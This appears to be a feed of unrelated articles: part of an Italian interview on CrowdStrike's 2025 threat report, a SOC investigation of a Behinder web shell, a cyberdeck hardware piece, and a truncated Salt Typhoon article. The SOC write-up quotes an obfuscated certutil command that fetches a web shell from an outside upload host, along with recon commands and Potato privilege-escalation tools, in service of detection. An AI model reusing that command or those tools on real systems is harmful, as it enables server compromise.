Luca Nilo Livrieri:KEYPLUG è un malware a bassa prevalenza, il che lo rende meno rilevabile rispetto ad altri malware più diffusi. Il suo impatto sul panorama delle minacce cyber è particolarmente significativo e ha contribuito a innalzare il livello generale di sofisticazione delle minacce. La sua condivisione tra diversi gruppi ha portato infatti a un continuo perfezionamento delle sue capacità, che l’hanno reso sempre più efficace e difficile da rilevare. La natura collaborativa dello sviluppo di KEYPLUG tra diversi gruppi di minacce cinesi sottolinea la necessità di un approccio alla sicurezza sempre più sofisticato e adattivo, capace di evolversi al passo con le crescenti capacità degli attaccanti.
Tra le caratteristiche di questo malware si trova l’utilizzo di chiavi RC4 definite dagli attori per crittografare le comunicazioni di rete, rendendo più difficile l’intercettazione e l’analisi del traffico. KEYPLUG utilizza server C2 con una durata mediana di 96 giorni, con variazioni significative tra i diversi gruppi di avversari, il che complica ulteriormente il tracciamento e la mitigazione. Per cifrare le comunicazioni tra i server C2 e i client, KEYPLUG utilizza certificati TLS auto-firmati, spesso con valori di campo predefiniti, per evitare il rilevamento. Tra le strategie che le organizzazioni possono adottare per rilevarne e mitigarne le minacce suggeriamo l’implementazione di soluzioni di monitoraggio del traffico di rete per identificare comportamenti anomali e comunicazioni sospette con server C2 noti. É consigliabile mantenere aggiornate le firme di rilevamento nei sistemi di sicurezza per includere gli indicatori di compromissione (IOC) associati a KEYPLUG, come gli indirizzi IP e i domini C2. Occorre verificare e analizzare i certificati TLS utilizzati nelle comunicazioni di rete per identificare quelli auto-firmati e sospetti. E’ necessario anche implementare la segmentazione della rete per limitare i movimenti laterali degli attaccanti e contenere eventuali compromissioni e, infine, educare il personale sulla sicurezza informatica e sulle tecniche di phishing per ridurre il rischio di compromissioni iniziali.
7-RHC: Restando in tema geografico/geopolitico, nell’ultimo decennio si è registrato un aumento delle attività criminali informatiche sponsorizzate dallo stato, (ad esempio il caso della violazione di SolarWinds, collegata alla Russia, che ha colpito la maggior parte dei governi e delle organizzazioni non governative statunitensi). Viste le recenti tensioni e conflitti (Cina/Taiwan, Russia/Ucraina, Israele/Hamas) il vostro team di cyber threat intelligence cosa ha osservato?
Luca Nilo Livrieri:Il panorama delle minacce cyber nel 2024 ha riflesso in modo significativo le crescenti tensioni geopolitiche globali, come evidenziato dal team di cyber threat intelligence di CrowdStrike. L’anno ha visto un’intensificazione senza precedenti delle attività criminali informatiche sponsorizzate da stati nazionali, con Cina, Russia e Corea del Nord in prima linea.
Nel GTR 2025 abbiamo identificato 26 nuovi avversari, portando il totale degli attori mappati a 257. La Cina ha dimostrato una notevole evoluzione nelle sue capacità offensive, registrando un incremento del 150% nelle attività di spionaggio informatico rispetto al 2023. (VEDI RISPOSTA 9 con dettaglio).
Sul fronte russo, le attività cyber sono state fortemente influenzate dal conflitto in Ucraina. Gli attori russi hanno mantenuto una presenza aggressiva nel cyberspazio, concentrandosi sulla raccolta di intelligence relativa all’Ucraina e ai membri della NATO. Le loro operazioni hanno dimostrato una notevole capacità di adattamento e di sviluppo di tecniche sempre più sofisticate.
La Corea del Nord ha invece mostrato un approccio distintivo, focalizzandosi principalmente sulla generazione di valuta attraverso operazioni cyber innovative. Il regime ha sviluppato schemi elaborati che includono frodi nel settore IT, utilizzando tattiche come interviste virtuali e “laptop farms”. Questa strategia riflette il tentativo del paese di aggirare le sanzioni internazionali attraverso mezzi cyber.
Il quadro complessivo emerso nel report evidenzia come le tensioni geopolitiche si siano tradotte in un’escalation significativa delle attività cyber sponsorizzate dagli stati. Questi attori hanno dimostrato una crescente sofisticazione nelle loro operazioni, integrando perfettamente le attività cyber con più ampi obiettivi strategici e geopolitici. Tale evoluzione sottolinea l’importanza crescente del dominio cyber come teatro di operazioni per il perseguimento di obiettivi statali, richiedendo un approccio sempre più sofisticato alla cybersecurity e una maggiore cooperazione internazionale nella risposta a queste minacce.
8-RHC: Riguardo la Corea del Nord, cosa avete osservato nei gruppi criminali che sono attivi per finanziare il regime di Pyongyang?
Luca Nilo Livrieri:Nel corso del 2024 il nostro team di cyber threat intelligence ha osservato che i gruppi criminali nordcoreani hanno continuato a focalizzarsi su operazioni informatiche atte a finanziare il regime di Pyongyang. Tra i principali elementi emersi dal nostro report c’è una innovazione nelle Operazioni di E-Crime: gruppi nordcoreani hanno innovato le loro operazioni di monetizzazione, utilizzando schemi di lavoro IT su larga scala in tutto il mondo.
È emerso come gruppo particolarmente attivo FAMOUS CHOLLIMA (304 incidenti legati a FAMOUS CHOLLIMA tracciati da CrowdStrike nel 2024). Quasi il 40% di questi incidenti rappresentava operazioni di insider threat.
I gruppi nordcoreani hanno utilizzato tecniche di social engineering per supportare la creazione di profili LinkedIn falsi con testi generati da strumenti di intelligenza artificiale generativa (genAI) e hanno sfruttato l’AI per fornire risposte più credibili durante i colloqui di lavoro. Con queste tecniche è stato possibile ingannare i recruiter e farsi assumere all’interno di grandi aziende come sviluppatori di software e tecnici IT. I “dipendenti” si facevano spedire i laptop aziendali in dotazione presso “Laptop farms” in paesi specifici per ottenere un IP pubblico di provenienza “trusted” (es. USA) e, una volta ottenuto l’accesso alle reti aziendali, installavano sui computer delle aziende strumenti di gestione remota (RMM) e estensioni del browser malevole per esfiltrare dati o eseguire altre attività malevole.
9-RHC: In base alle vostre indagini di intelligence, chi ha dominato nel 2024 il Threat Landscape a livello globale?
Luca Nilo Livrieri:Nel 2024 il panorama delle minacce cyber globali è stato caratterizzato da una predominanza significativa degli attori legati alla Cina, come già evidenziato. Le operazioni di spionaggio informatico cinesi hanno raggiunto livelli di maturità senza precedenti, registrando un incremento del 150% rispetto all’anno precedente. Questa escalation è stata accompagnata da un notevole perfezionamento delle capacità operative e della gestione infrastrutturale, in particolare attraverso l’implementazione sofisticata di reti di relay box operativi (ORB) per mascherare le loro attività.
Un aspetto particolarmente significativo del 2024 è stata l’identificazione infatti di sette nuovi attori legati alla Cina. Questo rappresenta un’evoluzione strategica importante, segnando il passaggio da operazioni di tipo “smash-and-grab” a intrusioni più mirate e sofisticate, ciascuna con obiettivi specifici e ben definiti.
La risposta degli attori cinesi alle crescenti misure di contrasto implementate da governi, forze dell’ordine e ricercatori di sicurezza, è stata notevole. Hanno intensificato l’uso di tecniche di offuscamento, sfruttando reti ORB e condividendo strumenti tra diversi gruppi, dimostrando una maggiore resilienza operativa e capacità di mantenere l’anonimato.
L’impatto di queste operazioni si è fatto sentire in modo trasversale in tutti i settori a livello globale, con un’intensità particolare in alcuni ambiti strategici. I settori dei servizi finanziari, mediatico, manifatturiero e ingegneria industriale hanno registrato aumenti drammatici nelle attività malevole, con incrementi che hanno raggiunto il 200-300% rispetto agli anni precedenti.
10-RHC: Diamo ora uno sguardo alla difesa, può spiegare come Falcon Adversary OverWatch, Falcon Next-Gen SIEM (crowdstrike.com/platform/next-…) ed i Counter Adversary Playbooks possano aiutare nel creare programmi di monitoraggio/intelligence completi e personalizzati?
Luca Nilo Livrieri:La combinazione di Falcon Adversary OverWatch, Falcon Next-Gen SIEM e Counter Adversary Playbooks rappresenta un approccio integrato alla sicurezza che permette di creare programmi di monitoraggio e intelligence altamente efficaci e personalizzati. Falcon Adversary OverWatch fornisce un monitoraggio proattivo 24/7 delle attività sospette, con analisti esperti che valutano in tempo reale potenziali minacce. Questo servizio è particolarmente efficace nell’identificare le tattiche hands-on-keyboard e le tecniche di living-off-the-land che, come evidenziato nel GTR 2025, rappresentano il 79% delle intrusioni rilevate.
La capacità di OverWatch di distinguere tra attività legittime e malevole è cruciale, specialmente considerando la crescente sofisticazione degli attacchi. Falcon Next-Gen SIEM amplifica queste capacità integrando e correlando dati da diverse fonti in un’unica piattaforma di gestione degli eventi di sicurezza. La soluzione sfrutta l’intelligenza artificiale e il machine learning per analizzare grandi volumi di dati, identificando pattern sospetti e anomalie che potrebbero indicare un’intrusione. La sua architettura cloud-native permette una scalabilità e flessibilità superiori rispetto ai SIEM tradizionali. I Counter Adversary Playbooks completano il quadro fornendo procedure operative standardizzate e best practice specifiche per contrastare determinate tipologie di attaccanti. Questi playbook, basati su anni di osservazione e analisi delle tattiche degli avversari, permettono di: anticipare le mosse degli attaccanti, implementare contromisure mirate, accelerare i tempi di risposta agli incidenti e standardizzare le procedure di risposta.
L’integrazione di questi tre elementi permette di creare un programma di sicurezza che non solo rileva e risponde alle minacce, ma le anticipa e le previene attivamente, adattandosi continuamente all’evoluzione del panorama delle minacce. La personalizzazione di questi strumenti consente inoltre di allineare le difese alle specifiche esigenze e rischi dell’organizzazione, creando un sistema di protezione su misura e altamente efficace.
11-RHC: Quali sono i punti di forza del vostro prodotto Falcon Next-Gen SIEM? In cosa vi distinguete rispetto ai vostri competitor?
Luca Nilo Livrieri: Falcon Next-Gen SIEM si distingue nel mercato per diverse caratteristiche innovative e vantaggi competitivi significativi. La piattaforma si basa su un’architettura cloud-nativa che elimina la necessità di infrastrutture on-premise complesse, offrendo scalabilità immediata e costi operativi ridotti. Questa architettura moderna permette di processare e analizzare in tempo reale volumi di dati enormi, senza i limiti tradizionali dei SIEM legacy. Un punto di forza distintivo è l’integrazione nativa con l’ecosistema Falcon, che fornisce un contesto di threat intelligence immediato e accurato. Questo significa che ogni alert viene automaticamente arricchito con informazioni contestuali provenienti dal vasto database di minacce di CrowdStrike, permettendo una valutazione più rapida e precisa delle minacce.
La piattaforma eccelle nell’analisi comportamentale, utilizzando algoritmi di machine learning avanzati per identificare anomalie e potenziali minacce. Questo approccio è particolarmente efficace nel rilevare attacchi sofisticati che potrebbero sfuggire ai sistemi tradizionali, come le tecniche “living off the land” e gli attacchi senza malware che, come evidenziato nel GTR 2025, rappresentano la maggioranza delle intrusioni moderne. Un altro elemento distintivo è la capacità di fornire visibilità completa attraverso diversi ambienti – cloud, on-premise e ibridi – con una singola console di gestione. Questo elimina i silos informativi e semplifica significativamente le operazioni di security.
La piattaforma include anche capacità avanzate di automazione e orchestrazione, che permettono di rispondere rapidamente agli incidenti riducendo i tempi di risposta e il carico di lavoro manuale per i team di sicurezza. Infine, il modello di pricing trasparente e prevedibile, basato su sottoscrizione, elimina i costi nascosti tipici dei SIEM tradizionali legati all’ingestione e alla conservazione dei dati. Queste caratteristiche, combinate con il supporto continuo del team CrowdStrike e l’accesso a threat intelligence costantemente aggiornata, rendono Falcon Next-Gen SIEM una soluzione all’avanguardia nel panorama della sicurezza informatica.
12-RHC: Per quanto riguarda tattiche, tecniche e procedure (TTP) dei threat actors, in base al vostro monitoraggio durante il 2024, qual è stata la frequenza di attacchi attraverso lo sfruttamento vulnerabilità consecutive (exploit chaining), con l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) o con Zero Days?
Vi sono possibili previsioni su questo per il 2025?
Luca Nilo Livrieri: Nel 2024 CrowdStrike ha osservato un aumento significativo nell’uso di tattiche, tecniche e procedure (TTP) avanzate da parte degli attori delle minacce, in particolare attraverso lo sfruttamento di vulnerabilità consecutive (exploit chaining), l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) e l’uso di vulnerabilità zero-day.
Per quanto riguarda l’Exploit Chaining, gli attori delle minacce hanno frequentemente utilizzato catene di exploit per combinare più vulnerabilità e ottenere esecuzione di codice remoto (RCE) non autenticata. Ad esempio, nel novembre 2024, sono stati osservati attori che hanno combinato una vulnerabilità di bypass (CVE-2024-0012) con una vulnerabilità di escalation dei privilegi (CVE-2024-9474) nel software PAN-OS di Palo Alto Networks. Questo approccio ha consentito agli attori di aumentare le proprie capacità e l’impatto sugli obiettivi.
Essi hanno continuato a sfruttare funzionalità legittime (LOTL) dei sistemi per eseguire attacchi. Ad esempio, la funzionalità xp_cmdshell di Microsoft SQL Server è stata abusata per ottenere RCE in vari prodotti.
Gli attaccanti hanno continuato a sfruttare, inoltre, vulnerabilità zero-day per ottenere accesso iniziale e condurre attività malevole. Ad esempio, nel settembre 2024, un attore sconosciuto ha sfruttato una vulnerabilità di divulgazione di file (CVE-2024-21287) per ottenere credenziali in chiaro e successivamente ha sfruttato una vulnerabilità di deserializzazione (CVE-2024-20953) per compromettere i dispositivi.
CrowdStrike prevede che queste tattiche continueranno a essere prevalenti e si evolveranno ulteriormente nel 2025: l’exploit chaining, l’abuso di funzionalità legittime e lo sfruttamento di zero-day continueranno a rappresentare una minaccia significativa, richiedendo alle organizzazioni di adottare misure proattive.
13-RHC: L’abuso di account validi è diventato il principale vettore di accesso iniziale; le credenziali spesso vengono ottenute attraverso l’uso di information stealers o il social engineering.
Qual è l’impatto di ciò in attacchi a infrastrutture cloud aziendali?
Luca Nilo Livrieri: L’abuso di account validi è emerso come vettore principale di accesso iniziale agli ambienti cloud aziendali, rappresentando una minaccia significativa per la sicurezza delle infrastrutture cloud moderne.
Secondo il GTR 2025 questa tendenza ha registrato un impatto particolarmente rilevante, con un 35% di incidenti cloud legati proprio all’abuso di credenziali legittime che si lega al dato relativo agli annunci pubblicitari di credenziali degli access broker che sono aumentati del 50% su base annua.
Gli attaccanti hanno perfezionato le loro strategie di acquisizione delle credenziali, utilizzando principalmente due approcci: l’impiego di information stealers e di sofisticate tecniche di social engineering. Una volta ottenuto l’accesso iniziale attraverso credenziali valide, gli attori delle minacce possono muoversi lateralmente nell’ambiente cloud senza destare sospetti, sfruttando la legittimità apparente delle loro azioni per eludere i sistemi di sicurezza tradizionali.
La persistenza negli ambienti compromessi viene spesso stabilita attraverso la registrazione di dispositivi per l’autenticazione MFA o la creazione di backdoor sofisticate. Ciò permette agli attaccanti di mantenere l’accesso anche dopo eventuali modifiche alle credenziali iniziali. Particolarmente preoccupante è la capacità di questi attori di eludere le difese tradizionali, poiché l’uso di credenziali legittime rende estremamente difficile distinguere le attività malevoli da quelle lecite.
SCATTERED SPIDER, ad esempio, ha dimostrato particolare abilità nell’utilizzare account SSO compromessi per accedere a applicazioni critiche come SharePoint e Outlook, evidenziando la vulnerabilità delle soluzioni SaaS a questo tipo di attacchi. Questa tendenza è destinata a intensificarsi nel 2025, in quanto ci si aspetta che gli attaccanti continueranno a perfezionare le loro tecniche di evasione e a concentrarsi sempre più su obiettivi SaaS e cloud.
Per contrastare questa minaccia crescente, le organizzazioni devono implementare misure di sicurezza avanzate che vadano oltre la semplice protezione perimetrale. È essenziale adottare un approccio multilivello che includa il monitoraggio comportamentale, l’analisi delle anomalie e sistemi robusti di gestione delle identità e degli accessi. Solo attraverso una strategia di sicurezza completa e integrata sarà possibile mitigare efficacemente il rischio rappresentato dall’abuso di account validi negli ambienti cloud.
14-RHC: Ripensando agli attacchi in cui vengono sfruttate vulnerabilità di tipo Zero Day, è possibile rimanere un passo avanti (o almeno allo stesso passo) rispetto alla intraprendente esuberanza e alle continue innovazioni della criminalità digitale? Può l’attuale Intelligenza Artificiale Generativa (GenAI) essere di aiuto in questo?
Luca Nilo Livrieri:La sfida posta dalle vulnerabilità Zero Day nel panorama attuale della cybersecurity rappresenta una delle problematiche più complesse da affrontare, come evidenziato dai dati del GTR 2025. La rapidità con cui gli attaccanti riescono a sfruttare queste vulnerabilità, con tempi di “breakout” ridotti a una media di 48 minuti e picchi di efficienza di soli 51 secondi, impone un ripensamento radicale delle strategie difensive tradizionali.
L’Intelligenza Artificiale Generativa emerge come strumento potenzialmente rivoluzionario in questo contesto. La sua capacità di analizzare pattern complessi, generare scenari predittivi, e automatizzare risposte in tempo reale offre certamente nuove possibilità. L’implementazione di sistemi GenAI avanzati permette di sviluppare approcci proattivi alla sicurezza, anticipando potenziali vettori di attacco attraverso l’analisi predittiva e la simulazione di scenari complessi.
Nel contesto specifico delle vulnerabilità Zero Day, la GenAI dimostra particolare efficacia nell’analisi del codice sorgente e nell’identificazione di potenziali vulnerabilità prima che possano essere sfruttate. La sua capacità di processare e correlare enormi quantità di dati in tempo reale permette di identificare anomalie comportamentali e pattern sospetti che potrebbero indicare lo sfruttamento di vulnerabilità non ancora documentate. Tuttavia, è fondamentale riconoscere che la GenAI non rappresenta una soluzione definitiva, ma piuttosto un potente strumento da integrare in una strategia di sicurezza più ampia. L’efficacia di questi sistemi dipende infatti dalla qualità dei dati di addestramento e dalla loro continua ottimizzazione attraverso il feedback degli analisti di sicurezza. La componente umana rimane quindi essenziale, specialmente nell’interpretazione contestuale delle minacce e nella definizione delle strategie di risposta.
La vera innovazione risiede nella sinergia tra expertise umana e capacità computazionali della GenAI, sinergia che permette di sviluppare sistemi di difesa adattivi che possano evolversi rapidamente in risposta a nuove minacce, mantenendo al contempo la capacità di discriminazione e il giudizio critico necessari per evitare falsi positivi e ottimizzare le risorse di sicurezza. L’implementazione di framework di sicurezza basati su GenAI richiede un approccio olistico che includa monitoraggio continuo, threat hunting proattivo e capacità di risposta rapida agli incidenti. La formazione continua del personale di sicurezza nell’utilizzo efficace di questi strumenti diventa cruciale per massimizzare il potenziale.
L’integrazione della GenAI nelle strategie di sicurezza moderne offre infatti la possibilità di ridurre significativamente il divario temporale tra l’identificazione di una vulnerabilità e la sua mitigazione. Questo, combinato con approcci tradizionali di sicurezza e expertise umana, rappresenta attualmente la migliore strategia per mantenere una postura di sicurezza robusta di fronte all’evoluzione continua delle minacce Zero Day.
15-RHC: Ci può parlare di Charlotte AI, il vostro Generative AI Assistant? Siamo curiosi di sapere come è stato addestrato e su che stack tecnologico hardware/software sia basato (https://www.crowdstrike.com/en-us/resources/demos/conversations-with-charlotte-ai-at-risk-user-accounts/).
Luca Nilo Livrieri: Charlotte AI rappresenta un’implementazione di un sistema di intelligenza artificiale generativa con capacità agentic, che abbiamo integrato nativamente nella piattaforma Falcon di CrowdStrike. L’architettura multi-tenant, cloud-native, dell’assistente è stata progettata per operare su scala enterprise, processando petabyte di dati telemetrici in tempo reale attraverso una sofisticata infrastruttura distribuita.
L’architettura di machine learning sfrutta tecniche avanzate di transfer learning da modelli pre-addestrati, con fine-tuning continuo su dati cliente, ensemble methods per migliorare l’accuracy e sofisticati feedback loop per continuous learning. Il sistema di monitoring fornisce telemetria real-time delle performance, metriche di accuracy e precision, latency tracking e resource utilization monitoring.
Questa implementazione tecnica rappresenta un significativo avanzamento nell’applicazione di tecnologie AI alla cybersecurity, combinando modelli di machine learning all’avanguardia con architetture distribuite scalabili. La piattaforma evolve continuamente attraverso l’introduzione di nuove capacità tecniche e ottimizzazioni delle performance, mantenendo un focus sulla scalabilità enterprise e sulla sicurezza dei dati.
L’architettura modulare garantisce l’adattabilità alle minacce emergenti e alle esigenze, sempre in evoluzione, dei team di sicurezza, permettendo l’integrazione continua di nuovi modelli e capacità analitiche aiutando nelle fasi di detection, investigation e response.
16-RHC: Luca, la ringraziamo ancora per averci dato la possibilità di farle questa intervista sul vostro Global Threat Report 2025. C’è qualcosa che vuole aggiungere o che reputa interessante porre all’attenzione dei nostri lettori?
Luca Nilo Livrieri: Si, mi piacerebbe chiudere con qualche raccomandazione e best practices che suggeriamo di seguire:
- Proteggere l’intero ecosistema delle identità adottando MFA resistenti al phishing, implementando politiche di accesso forti e utilizzando strumenti di rilevamento delle minacce alle identità integrati con piattaforme XDR.
- Eliminare i gap di visibilità cross-domain: modernizzando le strategie di rilevamento e risposta con soluzioni XDR e SIEM di nuova generazione, svolgendo threat hunting proattivo e utilizzando intelligence sulle minacce.
- Difendere il cloud come infrastruttura core: utilizzare CNAPP con capacità CDR, eseguire audit regolari per scoprire configurazioni errate e vulnerabilità non patchate.
- Dare priorità al patching dei sistemi critici e utilizzare strumenti come Falcon Exposure Management per concentrarsi sulle vulnerabilità ad alto rischio.
- Adottare un approccio basato sull’intelligence, integrare l’intelligence nelle operazioni di sicurezza, avviare programmi di consapevolezza degli utenti e svolgere esercitazioni di tabletop e red/blue teaming.
L'articolo Red Hot Cyber Intervista CrowdStrike sul Global Threat Report 2025 proviene da il blog della sicurezza informatica.
The SOC files: Chasing the web shell
Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.
This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.
Onset
It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.
From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.
As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.
A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]
Aftermath
To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato
Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.
With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?
Identifying the threat
Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:
The “extraData” structure example
Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.
Uncovering modules and variants
By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:
Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample
Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames
Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.
Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.
The bigger picture
Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:
ASPX web shell side by side with .NET payload
Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.
Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.
For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.
Happy hunting and see you on the next mission!
YARA rule
rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}
Indicators of compromise
Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll
File paths
C:\ProgramData\DRM\
C:\Users\Default\Videos\
securelist.com/soc-files-web-s…
A Precisely Elegant Cyberdeck Handheld
[Nicholas LaBonte] shows off a Cyberdeck Handheld that demonstrates just how good something can look when care and attention goes into the design and fabrication. He wanted to make something that blended cyberpunk and nautical aesthetics with a compact and elegant design, and we think he absolutely succeeded.
On the inside is a Raspberry Pi and an RTL-SDR. The back of the unit is machined from hardwood, and sports a bronze heat sink for the Raspberry Pi. The front has a prominent red PSP joystick for mouse input and a custom keyboard. The keyboard is especially interesting. On the inside it’s a custom PCB with tactile switches and a ATmega32U4 running QMK firmware — a popular choice for DIY keyboards — and presents to the host as a regular USB HID device.
How did he make those slick-looking keys? It’s actually a single plate that sits between the front panel and the switches themselves. [Nicholas] used a sheet of polymer with a faux-aluminum look to it and machined it down, leaving metal-looking keys with engraved symbols as tabs in a single panel. It looks really good, although [Nicholas] already has some ideas about improving it.
On the right side is the power button and charging port, and astute readers may spot that the power button is where a double-stack of USB ports would normally be on a Raspberry Pi 5. [Nicholas] removed the physical connectors, saving some space and connecting the USB ports internally to the keyboard and SDR.
As mentioned, [Nicholas] is already full of ideas for improvements. The bronze heat sink isn’t as effective as he’d like, the SDR could use some extra shielding, and the sounds the keyboard ends up making could use some work. Believe it or not, there’s still room to spare inside the unit and he’d maybe like to figure out a way to add a camera, GPS receiver, or maybe a 4G modem. We can’t wait! Get a good look for yourself in the video, embedded below.
youtube.com/embed/u8kYHgKKhjY?…
Salt Typhoon (RedMike): La Cyber Minaccia Cinese che Sta Scuotendo il Mondo
Negli ultimi mesi, il gruppo di hacker cinese conosciuto come Salt Typhoon ha continuato a far parlare di sé grazie alle sue tattiche aggressive e persistenti nel settore della cybersicurezza.
Nonostante le sanzioni imposte dagli Stati Uniti e un’attenta sorveglianza governativa, Salt Typhoon ha dimostrato di non rallentare le proprie attività, continuando a lanciare attacchi coordinati contro istituzioni educative e infrastrutture critiche a livello globale.
Salt Typhoon (RedMike): Una Minaccia Globale
